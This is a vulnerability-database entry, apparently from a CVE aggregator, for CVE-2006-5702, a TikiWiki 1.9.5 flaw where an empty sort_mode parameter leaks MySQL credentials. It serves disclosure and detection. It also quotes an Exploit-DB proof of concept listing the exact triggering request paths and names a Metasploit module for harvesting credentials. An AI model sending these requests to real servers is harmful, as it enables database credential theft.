CVE-2006-5702
published 2006-11-04CVE-2006-5702: Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1)…
PriorityP342medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
53.07%
98.8th percentile
Tikiwiki 1.9.5 allows remote attackers to obtain sensitive information (MySQL username and password) via an empty sort_mode parameter in (1) tiki-listpages.php, (2) tiki-lastchanges.php, (3) messu-archive.php, (4) messu-mailbox.php, (5) messu-sent.php, (6) tiki-directory_add_site.php, (7) tiki-directory_ranking.php, (8) tiki-directory_search.php, (9) tiki-forums.php, (10) tiki-view_forum.php, (11) tiki-friends.php, (12) tiki-list_blogs.php, (13) tiki-list_faqs.php, (14) tiki-list_trackers.php, (15) tiki-list_users.php, (16) tiki-my_tiki.php, (17) tiki-notepad_list.php, (18) tiki-orphan_pages.php, (19) tiki-shoutbox.php, (20) tiki-usermenu.php, and (21) tiki-webmail_contacts.php, which reveal the information in certain database error messages.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiki | tikiwiki_cms_groupware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Trigger condition is an empty (blank) `sort_mode` GET parameter submitted to any of the 21 vulnerable TikiWiki PHP scripts; the resulting MySQL error message leaks the database username and password in the HTTP response body. ↗
- →Detect HTTP requests to TikiWiki paths containing `sort_mode=` with an empty value (i.e., `sort_mode=` at end of query string or followed by `&`) — no authentication required, exploitable by anonymous users. ↗
- →A Metasploit auxiliary module exists for this vulnerability under `auxiliary/admin/tikiwiki/tikidblib`, enabling automated exploitation for credential harvesting. ↗
- ·Vulnerability is confirmed only in TikiWiki version 1.9.5 (CVS) -Sirius-; other versions are not confirmed affected by the sources. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
exploitdb·2006-11-01
CVE-2006-5703 TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
---
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sor
Metasploit
TikiWiki Information Disclosure
metasploit
TikiWiki Information Disclosure
TikiWiki Information Disclosure
A vulnerability has been reported in Tikiwiki, which can be exploited by an anonymous user to dump the MySQL user & passwd just by creating a mysql error with the "sort_mode" var. The vulnerability was reported in Tikiwiki version 1.9.5.
No writeups or analysis indexed.
http://secunia.com/advisories/22678http://secunia.com/advisories/23039http://security.gentoo.org/glsa/glsa-200611-11.xmlhttp://securityreason.com/securityalert/1816http://www.securityfocus.com/archive/1/450268/100/0/threadedhttp://www.securityfocus.com/bid/20858http://www.vupen.com/english/advisories/2006/4316https://exchange.xforce.ibmcloud.com/vulnerabilities/29960http://secunia.com/advisories/22678http://secunia.com/advisories/23039http://security.gentoo.org/glsa/glsa-200611-11.xmlhttp://securityreason.com/securityalert/1816http://www.securityfocus.com/archive/1/450268/100/0/threadedhttp://www.securityfocus.com/bid/20858http://www.vupen.com/english/advisories/2006/4316https://exchange.xforce.ibmcloud.com/vulnerabilities/29960
2006-11-04
Published